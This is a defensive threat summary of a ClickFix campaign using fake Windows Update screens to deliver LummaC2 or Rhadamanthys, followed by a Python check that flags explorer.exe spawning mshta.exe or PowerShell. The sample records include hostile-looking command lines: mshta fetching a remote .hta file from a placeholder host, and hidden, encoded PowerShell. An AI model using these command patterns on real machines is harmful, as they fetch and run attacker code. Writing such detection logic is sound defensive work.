Overview
- Huntress and other researchers confirm the full‑screen Windows Update ruse remained active in late November, even after Operation Endgame curtailed Rhadamanthys delivery on some domains, although those domains still host the lure pages.
- The attacks follow a consistent chain: mshta.exe launches JavaScript, which runs obfuscated PowerShell that loads a .NET Stego Loader; the loader extracts Donut‑packed shellcode from PNG pixels and deploys LummaC2 or Rhadamanthys.
- Campaign infrastructure rotates, with domains changing URIs; the IP address 141.98.80[.]175 is cited, and first‑stage URLs carry a hex‑encoded second octet that links the observed incidents.
- Distribution now includes malvertised adult‑site clones that hijack the screen and attempt to block escape keys, and some lure code contains Russian‑language developer comments, according to Acronis and Huntress.
- Microsoft reports that ClickFix is the leading initial access method, at 47% of attacks; defenders are urged to disable the Windows Run box, train users never to paste commands from webpages, and monitor for explorer.exe spawning mshta.exe or PowerShell.
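The parent-child monitoring advice above, as an added example that is not code from Huntress, Microsoft or the article: a small check over constructed process-creation records (Sysmon-style `ParentImage`, `Image`, `CommandLine` fields are assumed) that flags explorer.exe spawning mshta.exe or PowerShell, and notes a remote URL or encoded/hidden PowerShell flags on the command line as extra signals.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample records, loosely modelled on Sysmon Event ID 1 fields.
# None of these are real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe hxxp://example.invalid/update.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -w hidden -enc SQBFAFgA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "CommandLine": r"notepad++.exe notes.txt"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]

# Children a ClickFix lure drives the user into launching from the Run box,
# which is hosted by explorer.exe, so explorer.exe shows up as the parent.
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "pwsh.exe"}

@dataclass
class Finding:
    child: str
    reasons: list

def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(event: dict) -> Optional[Finding]:
    """Return a Finding when explorer.exe spawns mshta.exe or PowerShell."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    if parent != "explorer.exe" or child not in SUSPICIOUS_CHILDREN:
        return None
    reasons = ["explorer.exe spawned " + child]
    cmd = event.get("CommandLine", "")
    if re.search(r"https?://|hxxp", cmd, re.I):
        reasons.append("remote URL on command line")
    if re.search(r"-(enc|encodedcommand|w\s+hidden)\b", cmd, re.I):
        reasons.append("encoded or hidden PowerShell flags")
    return Finding(child, reasons)

def scan(events: list) -> list:
    """Apply check_event to every record and keep the hits."""
    return [f for f in (check_event(e) for e in events) if f]
```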